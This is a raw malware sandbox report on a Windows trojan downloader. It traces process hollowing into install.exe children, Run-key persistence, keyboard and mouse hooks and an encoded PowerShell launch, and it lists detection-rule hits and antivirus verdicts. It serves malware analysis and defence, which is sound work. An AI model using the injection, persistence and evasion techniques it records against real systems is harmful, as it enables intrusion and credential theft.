 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@BäïGHüâG¸ ( *.+{*+÷B++ }*+õ+ô( *Ö+ ÀG%Ð+ ++*( +â( +ío +è(+ã0¥,_+x8
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0
url https://curl.haxx.se/docs/http-cookies.html
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Communications use DNS rule Network_DNS
description Communications smtp rule network_smtp_raw
description Match Windows Inet API call rule Str_Win32_Internet_API
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
description Escalate priviledges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Possibly employs anti-virtualization techniques rule vmdetect
description Bypass DEP rule disable_dep
host 199.188.203.151
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2896
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000224
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3044
region_size: 4923392
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002ec
1 0 0

NtProtectVirtualMemory

 process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 1972
region_size: 3989504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000374
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Fsaxd reg_value "C:\Users\test22\AppData\Roaming\Fdqudm\Fsaxd.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Fsaxd reg_value "C:\Users\test22\AppData\Roaming\Fdqudm\Fsaxd.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcsvc reg_value C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
Time & API Arguments Status Return Repeated

SetWindowsHookExW

 thread_identifier: 0
callback_function: 0x0050f84a
hook_identifier: 14 (WH_MOUSE_LL)
module_address: 0x00000000
1 524757 0
Process injection Process 3044 manipulating memory of non-child process 3044
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225496 0

NtProtectVirtualMemory

 process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 73901024 (PAGE_EXECUTE_READ|PAGE_EXECUTE_READWRITE|PAGE_EXECUTE_WRITECOPY|PAGE_GUARD|PAGE_NOCACHE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225541 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: Ìa±aV;fUfV£fV•ëVFL‡¦zšfBÅ1Å>IæHVV¥¤ø£]f)f@‡úböÄM—G—G\‹h7@8ǜ â}lÑ» Xì ªÍ€gÖá4>„?_^dŸ±oqoÐoÖJJêðïôðïðï ðï#$"JJ'o6o<#$"A@D#$"HGKoR^„ƒ‚€~}|{zyhg†•”“’‘~{ŽŒ‹œ¨ãÅÄÃÂÁðïÇcž°³îüû íäìäøää éêö9<8;ÊËÌÍÎÏÐÑÒÓÔ†…Ù†…  b Er4N]Z[ Y
base_address: 0x0043a000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: €
base_address: 0x0043b000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer: ðG 0
base_address: 0x008b0000
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞVcۚ7 ˆš7 ˆš7 ˆ.«üˆ„7 ˆ.«þˆ]7 ˆ.«ÿˆ¾7 ˆ—ʈœ7 ˆ¡i‰†7 ˆ E ‰ý6 ˆ i‰7 ˆ i ‰Æ7 ˆGÈ݈ž7 ˆGÈ܈›7 ˆGÈƈ™7 ˆš7 ˆß5 ˆn‰˜7 ˆGÈȟ7 ˆ¡i ‰°7 ˆ¡i‰7 ˆ i‰7 ˆ i‰›7 ˆRichš7 ˆPELòÓÛ`à ì-<ˆ¤(.@à<€D¤8(:¼I¬’4Р2@.Ô̆8€.textê-ì- `.rdata¶º .¼ ð-@@.dataœÀ8"¬8@À.gfidsø`:Î9@@.tls €:à9@À.reloc¼I:Jâ9@B
base_address: 0x00400000
process_identifier: 1972
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer: €
base_address: 0x007a8000
process_identifier: 1972
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 1972
process_handle: 0x00000374
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞVcۚ7 ˆš7 ˆš7 ˆ.«üˆ„7 ˆ.«þˆ]7 ˆ.«ÿˆ¾7 ˆ—ʈœ7 ˆ¡i‰†7 ˆ E ‰ý6 ˆ i‰7 ˆ i ‰Æ7 ˆGÈ݈ž7 ˆGÈ܈›7 ˆGÈƈ™7 ˆš7 ˆß5 ˆn‰˜7 ˆGÈȟ7 ˆ¡i ‰°7 ˆ¡i‰7 ˆ i‰7 ˆ i‰›7 ˆRichš7 ˆPELòÓÛ`à ì-<ˆ¤(.@à<€D¤8(:¼I¬’4Р2@.Ô̆8€.textê-ì- `.rdata¶º .¼ ð-@@.dataœÀ8"¬8@À.gfidsø`:Î9@@.tls €:à9@À.reloc¼I:Jâ9@B
base_address: 0x00400000
process_identifier: 1972
process_handle: 0x00000374
1 1 0
Time & API Arguments Status Return Repeated

SetWindowsHookExW

 thread_identifier: 0
callback_function: 0x004ca8cc
hook_identifier: 13 (WH_KEYBOARD_LL)
module_address: 0x00000000
1 1179889 0
Process injection Process 2076 called NtSetContextThread to modify thread in remote process 2896
Process injection Process 2896 called NtSetContextThread to modify thread in remote process 3044
Process injection Process 3044 called NtSetContextThread to modify thread in remote process 1972
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4239006
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2896
1 0 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 3996720
registers.edi: 0
registers.eax: 8908798
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002fc
process_identifier: 3044
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 6857864
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001e4
process_identifier: 1972
1 0 0
Process injection Process 2076 resumed a thread in remote process 2896
Process injection Process 2896 resumed a thread in remote process 3044
Process injection Process 3044 resumed a thread in remote process 1972
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2896
1 0 0

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x000001e4
suspend_count: 1
process_identifier: 1972
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2076
1 0 0

NtResumeThread

 thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2076
1 0 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2076
1 0 0

NtResumeThread

 thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2076
1 0 0

NtResumeThread

 thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2076
1 0 0

NtResumeThread

 thread_handle: 0x00000228
suspend_count: 1
process_identifier: 2076
1 0 0

CreateProcessInternalW

 thread_identifier: 2252
thread_handle: 0x000004c0
process_identifier: 2248
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000004c8
1 1 0

CreateProcessInternalW

 thread_identifier: 2900
thread_handle: 0x00000200
process_identifier: 2896
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\install.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000224
1 1 0

NtGetContextThread

 thread_handle: 0x00000200
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2896
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000224
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00427000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00438000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: Ìa±aV;fUfV£fV•ëVFL‡¦zšfBÅ1Å>IæHVV¥¤ø£]f)f@‡úböÄM—G—G\‹h7@8ǜ â}lÑ» Xì ªÍ€gÖá4>„?_^dŸ±oqoÐoÖJJêðïôðïðï ðï#$"JJ'o6o<#$"A@D#$"HGKoR^„ƒ‚€~}|{zyhg†•”“’‘~{ŽŒ‹œ¨ãÅÄÃÂÁðïÇcž°³îüû íäìäøää éêö9<8;ÊËÌÍÎÏÐÑÒÓÔ†…Ù†…  b Er4N]Z[ Y
base_address: 0x0043a000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: €
base_address: 0x0043b000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0043c000
process_identifier: 2896
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2896
process_handle: 0x00000224
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4239006
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2896
1 0 0

NtResumeThread

 thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2896
1 0 0

NtResumeThread

 thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x00000490
suspend_count: 1
process_identifier: 2248
1 0 0

CreateProcessInternalW

 thread_identifier: 3048
thread_handle: 0x000002fc
process_identifier: 3044
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\install.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\install.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000002ec
1 1 0

NtGetContextThread

 thread_handle: 0x000002fc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3044
region_size: 4923392
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002ec
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00880000
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer: ðG 0
base_address: 0x008b0000
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3044
process_handle: 0x000002ec
1 1 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 3996720
registers.edi: 0
registers.eax: 8908798
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002fc
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x0000019c
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x000001e4
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

 thread_handle: 0x00000228
suspend_count: 1
process_identifier: 3044
1 0 0

CreateProcessInternalW

 thread_identifier: 2208
thread_handle: 0x00000394
process_identifier: 2192
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000039c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00000000
process_identifier: 3044
process_handle: 0x0000025c
0 0

NtResumeThread

 thread_handle: 0x000001d4
suspend_count: 1
process_identifier: 3044
1 0 0

CreateProcessInternalW

 thread_identifier: 1968
thread_handle: 0x000001e4
process_identifier: 1972
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\install.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000374
1 1 0

NtGetContextThread

 thread_handle: 0x000001e4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1972
region_size: 3989504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000374
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞVcۚ7 ˆš7 ˆš7 ˆ.«üˆ„7 ˆ.«þˆ]7 ˆ.«ÿˆ¾7 ˆ—ʈœ7 ˆ¡i‰†7 ˆ E ‰ý6 ˆ i‰7 ˆ i ‰Æ7 ˆGÈ݈ž7 ˆGÈ܈›7 ˆGÈƈ™7 ˆš7 ˆß5 ˆn‰˜7 ˆGÈȟ7 ˆ¡i ‰°7 ˆ¡i‰7 ˆ i‰7 ˆ i‰›7 ˆRichš7 ˆPELòÓÛ`à ì-<ˆ¤(.@à<€D¤8(:¼I¬’4Р2@.Ô̆8€.textê-ì- `.rdata¶º .¼ ð-@@.dataœÀ8"¬8@À.gfidsø`:Î9@@.tls €:à9@À.reloc¼I:Jâ9@B
base_address: 0x00400000
process_identifier: 1972
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 1972
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x006e0000
process_identifier: 1972
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0078c000
process_identifier: 1972
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x007a6000
process_identifier: 1972
process_handle: 0x00000374
1 1 0
Bkav W32.AIDetectNet.01
Lionic Trojan.MSIL.Scarsi.4!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
VIPRE Gen:Variant.Lazy.256492
Symantec ML.Attribute.HighConfidence
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Lazy.256492
MicroWorld-eScan Gen:Variant.Lazy.256492
Avast Win32:PWSX-gen [Trj]
Ad-Aware Gen:Variant.Lazy.256492
Emsisoft Gen:Variant.Lazy.256492 (B)
McAfee-GW-Edition BehavesLike.Win32.Trojan.cm
Trapmine suspicious.low.ml.score
FireEye Generic.mg.9628afc9116db529
SentinelOne Static AI - Suspicious PE
GData Gen:Variant.Lazy.256492
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Google Detected
McAfee Artemis!9628AFC9116D
MAX malware (ai score=89)
VBA32 Downloader.MSIL.gen.rexp
Cylance Unsafe
Ikarus Trojan-Downloader.MSIL.Agent
MaxSecure Trojan.Malware.300983.susgen
BitDefenderTheta Gen:NN.ZemsilF.34726.mm0@aOB1QSc
AVG Win32:PWSX-gen [Trj]
CrowdStrike win/malicious_confidence_90% (W)